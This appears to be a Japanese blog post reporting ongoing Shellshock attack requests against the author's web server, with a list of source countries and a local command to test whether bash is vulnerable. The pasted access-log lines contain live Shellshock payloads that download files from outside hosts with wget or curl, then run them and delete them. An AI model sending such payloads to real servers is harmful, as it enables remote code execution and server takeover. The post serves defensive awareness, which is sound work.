adsense

2014年10月5日日曜日

bashの脆弱性を狙ったリクエスト (その2)

現在もbashの脆弱性を狙ったリクエストが継続しています。
下記の通り、bashの引数に色々なコマンドが付与されたリクエストがきており、単なる調査目的のものから、踏み台にして他のサイトに対して不正アクセスを試みるものまで様々見受けられます。

217.72.242.16 - - [29/Sep/2014:00:08:28 +0000] "GET /test/ HTTP/1.0" 403 287 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
173.45.100.18 - - [29/Sep/2014:03:31:29 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
8.37.217.198 - - [29/Sep/2014:18:06:22 +0000] "GET /result.php HTTP/1.1" 200 21422 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [29/Sep/2014:23:03:12 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
62.210.75.170 - - [30/Sep/2014:06:09:40 +0000] "GET / HTTP/1.1" 200 25839 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
62.210.75.170 - - [30/Sep/2014:06:09:41 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 305 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
142.4.215.115 - - [01/Oct/2014:08:20:56 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
8.37.217.196 - - [01/Oct/2014:21:08:43 +0000] "GET /blacklist.html HTTP/1.1" 200 22457 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [01/Oct/2014:21:08:43 +0000] "GET /widgets.html HTTP/1.1" 200 5297 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [01/Oct/2014:21:08:44 +0000] "GET /tagsearch.html HTTP/1.1" 200 20663 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [02/Oct/2014:01:48:59 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
50.193.119.109 - - [02/Oct/2014:17:39:18 +0000] "GET / HTTP/1.0" 200 25889 "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:17:07:30 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 305 "-" "() { :;}; /bin/bash -c \"

アクセス元のIPアドレスを調べると、アクセスが多い順で、

1. アメリカ
2. フランス
3. 中国
4. イギリス
5. カナダ
6. オランダ

となっていました。

下記のコマンドをコンソール上で実行することにより、脆弱性があるか確認できますので、必要に応じて対策を実施しましょう。

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

“echo vulnerable“ の部分が勝手に実行されてしまうコマンド部分

– 脆弱性がある場合の表示
• vulnerable
• this is a test

– 脆弱性がない場合の表示
• bash: warning: x: ignoring function definition attempt
• bash: error importing function definition for `x'
• this is a test



0 件のコメント:

コメントを投稿